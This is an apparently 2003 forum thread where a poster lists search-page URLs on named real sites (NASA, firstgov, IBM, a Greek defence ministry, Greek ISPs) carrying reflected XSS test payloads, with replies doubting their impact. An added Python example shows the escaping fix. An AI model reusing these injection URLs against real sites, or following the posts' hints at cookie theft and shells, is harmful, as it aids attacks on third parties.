Xss!!!!!!
  1. #1
    Junior Member
    Join Date
    Jul 2003
    Posts
    1

    Xss!!!!!!

    Here are some vulnerable sites I found:

    We start with NASA.GOV

    http://search.nasa.gov/nasasearch/se...ubmitsearch.x=<script>alert("m")</script>&submitsearch.y=<script>alert("m")</script>

    http://search.nasa.gov/nasasearch/br...gory+Search.x=<script>alert("m")</script>&Category+Search.y=<script>alert("m")</script>

    And we go on with Fbi:

    hmmm what is this?

    http://www.firstgov.gov/fgsearch/ind...ubmit=+Search+


    w0w! INTERNAL server error

    http://www.firstgov.gov/fgsearch/index.jsp?dom=<script>alert("m")</script>&mw0=%3Cscript%3Ealert%28%22m%22%29%3C%2Fscript%3E&rn=218&in0=domain&parsed=true&Submit=Go&domain=fbi.gov

    http://www.firstgov.gov/fgsearch/index.jsp?dom0=<script>alert("m")</script>&mw0=%3Cscript%3Ealert%28%22m%22%29%3C%2Fscript%3E&rn=218&in0=domain&parsed=true&Submit=Go&domain=fbi.gov

    Ibm is also vulnerable:

    http://www.ibm.com/Search?v=11&lang=...t%3E&Search.x=<script>alert("m")</script>&Search.y=<script>alert("m")</script>

    www.opera.com
    In the search engine write: <script>alert("m")</script>

    http://www.business.com/search/rslt_...=&bdcf=&vt=all

    http://www.searchengineworld.com/
    --Write <script>alert("m")</script> in the e-mail address field


    http://www.crackfound.com/engine.cgi...9%3C/script%3E

    http://www.thebugs.ws/search.php?q=%...9%3C/script%3E

    http://www.ibm.com/Search?v=11&lang=...t%3E&Search.x=<script>alert("m")</script>&Search.y=<script>alert("m")</script>

    http://www.anubis.gr/Users/default.a...er&act=newUser

    http://www.pcmaster.gr/forum/default.asp?Action=Search


    Ministry of defence in Greece:
    http://www.mod.mil.gr/contact/all_ma...html?seclevel=<script>alert("m")</script>

    Hol (hellas on line ISP):

    http://search.hol.gr/advanced.asp?advanced=<script>alert("insane")</script)&c2=<script>alert("insane")</script)&o2=<script>alert("Dr_insane%20Wuz%20Here")</script)&ct=<script>alert("Dr_insane%20Wuz%20Here")</script)&q1=%3Cscript%3Ealert%28%22m%22%29%3C%2Fscript%29&searchlang=&q2=<script>alert("m")</script)&so=<script>alert("Dr_insane%20Wuz%20Here")</script)

    http://search.hol.gr/search.asp?ct=G...o.x=14&Go.y=16


    http://www.linuxfreaks.gr/

    http://www.findlink.gr/searching.asp?key=<script>alert("m")</script>&logic=any
    http://search.pathfinder.gr/search?q...ipt%3E&tab=web

    http://www.anazitisis.gr/cgi-bin/hts....x=5&search.y=<script>alert("m")</script>

    http://www.ditto.com/searchResults.a...t%3E&search.x=<script>alert("m")</script>&search.y=<script>alert("m")</script>

    http://promosearch.atomz.com/search/...8112&submit.x=<script>alert("m")</script>&submit.y=<script>alert("m")</script>

    http://www.askjeeves.com ****

    http://www.mixer.gr/cgi-bin/mxmeta?q...3C%2Fscript%3E
    http://www.robby.gr/search.rsp?searc...615407&parent=

    EOF

    /dr_insane
    dr_insane at pathfinder.gr
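
Added example, not part of the thread or any poster's code: the server-side fix for the reflection shown in the URLs above, where search pages echo query parameters (including the image-submit `.x`/`.y` click coordinates) into the HTML unencoded. The function names and the sample query string are constructed for illustration.

```python
import html
from urllib.parse import parse_qs

# Constructed sample query string modelled on the image-submit parameters
# (".x"/".y" click coordinates) that appear in the URLs above.
SAMPLE_QUERY = 'q=mars&submitsearch.x=<script>alert("m")</script>&submitsearch.y=12'


def render_vulnerable(query: str) -> str:
    """Echo every parameter into the page unencoded (the reported flaw)."""
    params = parse_qs(query, keep_blank_values=True)
    rows = "".join(f"<li>{k} = {v[0]}</li>" for k, v in params.items())
    return f"<ul>{rows}</ul>"


def coerce_coordinate(value: str) -> str:
    """Click coordinates are small non-negative integers; anything else becomes 0."""
    ok = value.isascii() and value.isdigit() and len(value) <= 5
    return value if ok else "0"


def render_hardened(query: str) -> str:
    """Validate typed fields, then HTML-encode everything written to the page."""
    params = parse_qs(query, keep_blank_values=True)
    rows = []
    for key, values in params.items():
        value = values[0]
        if key.endswith((".x", ".y")):
            value = coerce_coordinate(value)
        # Parameter names are attacker-controlled too, so encode both sides.
        safe_key = html.escape(key, quote=True)
        safe_value = html.escape(value, quote=True)
        rows.append(f"<li>{safe_key} = {safe_value}</li>")
    return "<ul>" + "".join(rows) + "</ul>"


if __name__ == "__main__":
    print(render_vulnerable(SAMPLE_QUERY))
    print(render_hardened(SAMPLE_QUERY))
```

`html.escape` covers HTML element and quoted-attribute contexts only; values placed inside inline script, URLs or CSS need the encoder for that context.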

  2. #2
    Banned
    Join Date
    Apr 2003
    Posts
    3,840
    Why don't you contact some of their webmasters and tell them their vulnerabilities .....

  3. #3
    The Iceman Cometh
    Join Date
    Aug 2001
    Posts
    1,210
    Really quick, what makes you classify those as vulnerabilities? Yes, these servers may contain vulnerabilities, but none of the links you posted are exploitable vulnerabilities. You're just passing a specific command into the search fields to give an internal server error. Doesn't appear to be anything special to me...

    AJ

  4. #4
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,535
    some background info on XSS and what you can do with it..

    http://hotwired.lycos.com/webmonkey/00/18/index3a.html
    http://www.idefense.com/XSS.html
    http://www.cgisecurity.com/articles/xss-faq.shtml

    source: http://www.google.com/search?q=xss&ie=UTF-8&oe=UTF-8

    so yes.. it does mean they might be exploitable.. but it doesn't mean they are !!
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  5. #5
    Junior Member
    Join Date
    Jun 2003
    Posts
    26
    Well, it depends on what you write in your script...
    you can also try in some asp/php forums or search engines to add more powerful commands and even get yourself a shell in some method...

  6. #6
    Senior Member
    Join Date
    Sep 2001
    Posts
    1,027
    Do these urls require authenticated sessions to get to them? Is there anything of value protected by these sessions? Otherwise, I don't see much point in stealing cookies (which is pretty much all you can do with javascript xss) from search pages...

    Of course if the site was parsing asp or php or some other server side scripting this might be bad indeed...

    Ammo
    Credit travels up, blame travels down -- The Boss
